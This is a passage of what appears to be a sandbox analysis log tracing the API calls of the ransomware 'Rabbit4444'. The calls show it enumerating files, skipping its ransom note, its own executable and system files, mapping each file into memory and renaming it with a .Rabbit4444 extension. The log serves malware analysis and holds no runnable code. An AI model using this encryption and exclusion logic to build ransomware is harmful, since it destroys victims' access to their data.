lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.372] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15068291477) returned 1 [0059.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.372] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.372] CloseHandle (hObject=0x298) returned 1 [0059.372] CloseHandle (hObject=0x278) returned 1 [0059.372] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms.Rabbit4444") returned 192 [0059.373] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.373] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x551cd3a2, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x551cd3a2, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x221b864e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x441, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", cAlternateFileName="CLC31C~1.SET")) returned 1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2=".") returned 1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="..") returned 1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="windows") returned -1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.373] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="boot") returned 1 [0059.374] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.374] lstrcmpiW (lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.374] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms" | out: lpString1="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms") returned="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms" [0059.374] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.374] lstrlenW (lpString="Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms") returned 64 [0059.374] lstrlenW (lpString="Rabbit4444") returned 10 [0059.374] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.374] lstrlenW (lpString=".dll") returned 4 [0059.374] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.374] lstrlenW (lpString=".lnk") returned 4 [0059.374] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.374] lstrlenW (lpString=".ini") returned 4 [0059.374] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.374] lstrlenW (lpString=".sys") returned 4 [0059.374] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.374] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b6b2793f-f4b9-49fd-b578-212c3c020892}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.374] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.374] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15068524962) returned 1 [0059.375] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1089) returned 1 [0059.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.375] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0059.375] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0059.376] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0059.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.377] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15068797200) returned 1 [0059.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.377] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0059.377] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.377] CloseHandle (hObject=0x298) returned 1 [0059.377] CloseHandle (hObject=0x278) returned 1 [0059.378] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms.Rabbit4444") returned 192 [0059.378] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b6b2793f-f4b9-49fd-b578-212c3c020892}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b6b2793f-f4b9-49fd-b578-212c3c020892}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.378] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55265d10, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55265d10, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23137ab2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", cAlternateFileName="CLD3B8~1.SET")) returned 1 [0059.378] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.378] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.378] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.378] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2=".") returned 1 [0059.379] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="..") returned 1 [0059.379] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="windows") returned -1 [0059.379] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.379] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.379] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="boot") returned 1 [0059.379] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.379] lstrcmpiW (lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.379] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms" | out: lpString1="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms") returned="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms" [0059.379] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.379] lstrlenW (lpString="Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms") returned 64 [0059.379] lstrlenW (lpString="Rabbit4444") returned 10 [0059.379] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.379] lstrlenW (lpString=".dll") returned 4 [0059.379] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.379] lstrlenW (lpString=".lnk") returned 4 [0059.380] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.380] lstrlenW (lpString=".ini") returned 4 [0059.380] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.380] lstrlenW (lpString=".sys") returned 4 [0059.380] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b7622f10-9a47-4bf2-b6ef-2c20b4510254}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.380] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.380] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15069075744) returned 1 [0059.380] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=963) returned 1 [0059.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.380] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0059.381] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0059.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.382] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.383] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.383] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15069329598) returned 1 [0059.383] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.383] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.383] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.383] CloseHandle (hObject=0x298) returned 1 [0059.383] CloseHandle (hObject=0x278) returned 1 [0059.383] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms.Rabbit4444") returned 192 [0059.383] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b7622f10-9a47-4bf2-b6ef-2c20b4510254}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b7622f10-9a47-4bf2-b6ef-2c20b4510254}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.384] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552fe67c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x552fe67c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", cAlternateFileName="CL4954~1.SET")) returned 1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2=".") returned 1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="..") returned 1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="windows") returned -1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="boot") returned 1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.384] lstrcmpiW (lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.384] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms" | out: lpString1="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms") returned="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms" [0059.384] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.384] lstrlenW (lpString="Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms") returned 64 [0059.384] lstrlenW (lpString="Rabbit4444") returned 10 [0059.384] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.384] lstrlenW (lpString=".dll") returned 4 [0059.384] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.385] lstrlenW (lpString=".lnk") returned 4 [0059.385] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.385] lstrlenW (lpString=".ini") returned 4 [0059.385] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.385] lstrlenW (lpString=".sys") returned 4 [0059.385] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b896819b-cf73-4da0-8f59-6e744a6bcd5f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.385] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.385] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15069576012) returned 1 [0059.385] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=998) returned 1 [0059.385] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.385] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0059.385] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0059.386] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0059.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.388] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15069835726) returned 1 [0059.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0059.388] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.388] CloseHandle (hObject=0x298) returned 1 [0059.388] CloseHandle (hObject=0x278) returned 1 [0059.388] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms.Rabbit4444") returned 192 [0059.388] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b896819b-cf73-4da0-8f59-6e744a6bcd5f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b896819b-cf73-4da0-8f59-6e744a6bcd5f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.389] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55455c09, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55455c09, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", cAlternateFileName="CL3A02~1.SET")) returned 1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2=".") returned 1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="..") returned 1 [0059.389] lstrcmpiW (lpString1="Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms", lpString2="windows") returned -1 [0059.389] lstrcmpiW 